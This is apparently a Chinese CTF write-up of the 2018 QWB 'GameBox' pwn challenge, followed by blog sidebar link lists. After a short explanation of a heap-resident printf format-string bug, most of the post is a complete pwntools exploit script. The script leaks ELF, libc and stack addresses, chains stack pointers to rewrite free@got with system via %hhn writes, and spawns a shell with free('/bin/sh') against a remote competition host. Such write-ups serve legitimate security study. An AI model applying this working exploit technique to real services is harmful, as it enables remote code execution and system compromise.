参考:

https://www.cnblogs.com/hac425/p/9416787.html

http://tacxingxing.com/2018/03/28/2018qwb/

事后复盘pwn,对于Gamebox一题发现网上wp都是大佬们利用堆玩出花,本菜鸡看到有printf格式化字符串漏洞,而且也没有防护,就想试试。但是难点在于printf(s)的s在堆上

由于printf(s)的s在堆上,利用起来没有栈上好用,需要在栈上找到这么一块内存。
stack: param 15 -> param 41 -> param X -> free@got (X每次运行都不同,需要计算)
通过 %10c%15$hhn 修改 param 41 的内容
通过 %10c%41$hhn 修改 param X 的内容,让其指向free@got
通过 %10c%966$hhn 修改 free@got的内容

如果没有param15,那么 param 41修改param X就会比较困难,hhn改1字节,hn改2字节,使用%n会不稳定。原来param X的内容很可能在栈上,需要修改3字节甚至更多,所以多一个param 15控制param 41,让整个格式化控制链更容易。

#!/usr/bin/env python2

# -*- coding:utf8 -*-

# execve generated by ROPgadget

import struct

from pwn import *

from pwnlib.util.proc import wait_for_debugger

#context(os='linux', arch='i386', log_level='debug') #i386 or amd64

#用python xxx.py elf 1调用远程

local = len(sys.argv) == 2

elf = ELF(sys.argv[1])

if local:

    io = process(sys.argv[1])

    #libc = ELF("/lib/i386-linux-gnu/libc.so.6") #32bit

    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #64bit

    #raw_input("wait for debugger:")

    #io = remote("localhost", 10001)

else:

    io = remote("106.2.25.7", 8001)

    libc = ELF("libc-2.23.so")

"""

puts("Welcome to Pig's GameBox!");

puts("(P)lay GUESS WORDS");

puts("(S)how RANK");

puts("(D)elete RANK");

puts("(C)hange RANK");

puts("(E)xit");

"""

def fuzz_guess_words(code,name_len,name):

    io.sendlineafter("(E)xit","P")

    io.sendlineafter("what I write:",code)

    pass

def play_guess_words(code,name_len,name):

    io.sendlineafter("(E)xit","P")

    io.sendlineafter("what I write:",code)

    io.sendlineafter(" name length:",str(name_len))

    io.sendlineafter("your name:",name)

def show_rank():

    io.sendlineafter("(E)xit","S")

def delete_rank(idx,code):

    io.sendlineafter("(E)xit","D")

    io.sendlineafter("Input index:",str(idx))

    io.sendlineafter("Input Cookie:",code)

s = """

NWLRBBMQBHCDARZOWKKYHIDD

QSCDXRJMOWFRXSJYBLDBEFSA

RCBYNECDYGGXXPKLORELLNMP

APQFWKHOPKMCOQHNWNKUEWHS

QMGBBUQCLJJIVSWMDKQTBXIX

MVTRRBLJPTNSNFWZQFJMAFAD

RRWSOFSBCNUVQHFFBSAQXWPQ

CACEHCHZVFRKMLNOZJKPQPXR

JXKITZYXACBHHKICQCOENDTO

MFGDWDWFCGPXIQVKUYTDLCGD

EWHTACIOHORDTQKVWCSGSPQO

QMSBOAGUWNNYQXNZLGDGWPBT

RWBLNSADEUGUUMOQCDRUBETO

KYXHOACHWDVMXXRDRYXLMNDQ

TUKWAGMLEJUUKWCIBXUBUMEN

MEYATDRMYDIAJXLOGHIQFMZH

LVIHJOUVSUYOYPAYULYEIMUO

TEHZRIICFSKPGGKBBIPZZRZU

CXAMLUDFYKGRUOWZGIOOOBPP

LEQLWPHAPJNADQHDCNVWDTXJ

BMYPPPHAUXNSPUSGDHIIXQMB

FJXJCVUDJSUYIBYEBMWSIQYO

YGYXYMZEVYPZVJEGEBEOCFUF

TSXDIXTIGSIEEHKCHZDFLILR

JQFNXZTQRSVBSPKYHSENBPPK

QTPDDBUOTBBQCWIVRFXJUJJD

DNTGEIQVDGAIJVWCYAUBWEWP

JVYGEHLJXEPBPIWUQZDZUBDU

""".replace("\n","").replace(" ","")

codes = [s[i*24:i*24+24] for i in range(len(s)/24)]

# print "codes",len(codes)

#fuzz the code

# wait_for_debugger(io.pid)

# while True:

    # fuzz_guess_words('a',20,"aa")

cidx = 0

#leak elf base

play_guess_words(codes[cidx],20,"%9$p..")

cidx +=1

#leak libc base

play_guess_words(codes[cidx],20,"%13$p..")

cidx +=1

#leap rsp

play_guess_words(codes[cidx],20,"%8$p..")

cidx += 1

#leap param 41

play_guess_words(codes[cidx],20,"%41$p..") #打印%41处地址

cidx += 1

#一个show_rank可以一次泄露,也可以多次show_rank

show_rank()

io.recvuntil("0:")

main_addr = int(io.recvuntil("..",drop=True),16) - 0x61

elf_base = main_addr - 6260

success("elf_base: %x"%elf_base)

io.recvuntil("1:")

__libc_start_main_addr = int(io.recvuntil("..",drop=True),16) - 0xf0

libc_base = __libc_start_main_addr - libc.symbols["__libc_start_main"]

success("libc_base: %x"%libc_base)

system_addr = libc_base + libc.symbols["system"]

free_addr = libc_base + libc.symbols["free"]

free_got = elf_base + elf.got["free"]

success("system_addr: %x"%system_addr)

success("free_addr: %x"%free_addr)

success("free_got: %x"%free_got)

io.recvuntil("2:")

rsp_addr = int(io.recvuntil("..",drop=True),16) - 0x30

success("rsp address: %x"%rsp_addr)

#stack: param15 -> param41 -> param X(未对齐)

io.recvuntil("3:")

param_41_addr = int(io.recvuntil("..",drop=True),16)

success("param 41 content: %x"%param_41_addr)

# 清理

delete_rank(0,codes[0])

delete_rank(1,codes[1])

delete_rank(2,codes[2])

delete_rank(3,codes[3])

def hhn_payload(x,pos):

    if x == 0:

        payload = pos

    else:

        payload = "%"+str(x)+"c"+ pos

    return payload

def hn_payload(x,pos):

    if x == 0:

        payload = pos

    else:

        payload = "%"+str(x)+"c"+ pos

    return payload

#修正param_41_addr与栈对齐

#stack: param15 -> param41 -> param X(已对齐)

if param_41_addr % 8 != 0:

    diff = 8 - param_41_addr %8 #需要进位7fff0ecdd2fd

    hn = (param_41_addr + diff) & 0xffff

    payload = hn_payload(hn,"%15$hn")

    play_guess_words(codes[cidx],20,payload)

    show_rank()

    delete_rank(0,codes[cidx])

    cidx += 1

    param_41_addr += diff

    success("param 41 content adjust: %x"%param_41_addr)

#将param X内容改为free_got

for i in range(8):

    #修改一位param X

    hhn = ((free_got >> (8*i) & 0xff))%256

    # print 'hhn',i,hhn

    payload = hhn_payload(hhn,"%41$hhn")

    play_guess_words(codes[cidx],20,payload)

    show_rank()

    delete_rank(0,codes[cidx])

    cidx += 1

    if i == 7:

        break

    #修改一位param 41

    hhn = (param_41_addr + i + 1)&0xff

    payload = hhn_payload(hhn,"%15$hhn")

    play_guess_words(codes[cidx],20,payload) #param41 += 1

    show_rank()

    delete_rank(0,codes[cidx])

    cidx += 1

#修改param41对应的地方,是程序名处,所以ida2pwntools就不能用了:P

#接下来就不能delete了,一般free_addr和system_addr相差3位

#先将param41的内容归位,指向param X(对齐)处。这里有可能进位了,但是概率比较少

hn = (param_41_addr)&0xffff

payload = hn_payload(hn,"%15$hn a")

play_guess_words(codes[cidx],20,payload)

cidx += 1

param_idx = (param_41_addr - rsp_addr)/8 + 6 #8字节对齐,前6位在寄存器中

success("param_idx: %d"%param_idx)

for i in range(3):

    #修改free_got低3字节

    hhn = ((system_addr >> (8*i) & 0xff))%256

    payload = hhn_payload(hhn,"%"+str(param_idx)+"$hhn b"+str(i))

    play_guess_words(codes[cidx],20,payload)

    cidx += 1

    if i == 2:

        break

    #修改 paramX -> free_got[i+1]

    hhn = (free_got + i + 1)&0xff

    payload = hhn_payload(hhn,"%41$hhn c"+str(i))

    play_guess_words(codes[cidx],20,payload)

    cidx += 1

#构造好串:param41的内容归位,修改free_got[0],修改param943+=1,修改free_got[1],修改param943+=1,修改free_got[2]

# wait_for_debugger(io.pid)

show_rank()

# 用free("/bin/sh") 进行 get_shell

play_guess_words(codes[cidx],20,"/bin/sh")

delete_rank(6,codes[cidx])

cidx +=1 

io.interactive()

仅做记录,如有不妥请大佬们指正。  

最新文章

  1. 2015-12-21(box-sizing:border-box)
  2. dedecms中调用制定栏目
  3. Docker的学习--介绍和安装
  4. HoverTree菜单0.1.3新增效果
  5. 循序渐进Python3(五) -- 初识模块
  6. CListCtrl中删除多个不连续的行
  7. chrome离线安装包_下载
  8. httplib、urllib、urllib2的区别
  9. Fiddler录制jmeter脚本,干货分享
  10. cojs 简单的区间问题 解题报告
  11. 最完整的自动化测试流程:Python编写执行测试用例及定时自动发送最新测试报告邮件
  12. Led控件
  13. Override与Overload
  14. Spring AOP 简介
  15. 微博Rss邮箱推送系统
  16. Scratch 简单的小游戏 --- 碰碰球
  17. python批量插入mysql数据库(性能相关)以及反引号的使用
  18. python之面向对象的高级进阶
  19. 基础的linux学习
  20. Linux--安全加固02

热门文章

  1. SQLalchemy 使用记录
  2. CentOS下Samba使用
  3. 《手把手教你学C语言》学习笔记(10)--- 程序的循环控制
  4. python 集合比较(交集、并集,差集)
  5. C结构体struct用法小结
  6. uva 11491:Erasing and Winning(贪心)
  7. 【C/C++】知识点
  8. RAID 1-6
  9. JDK1.5新特性:
  10. PHP的按位运算符是什么意思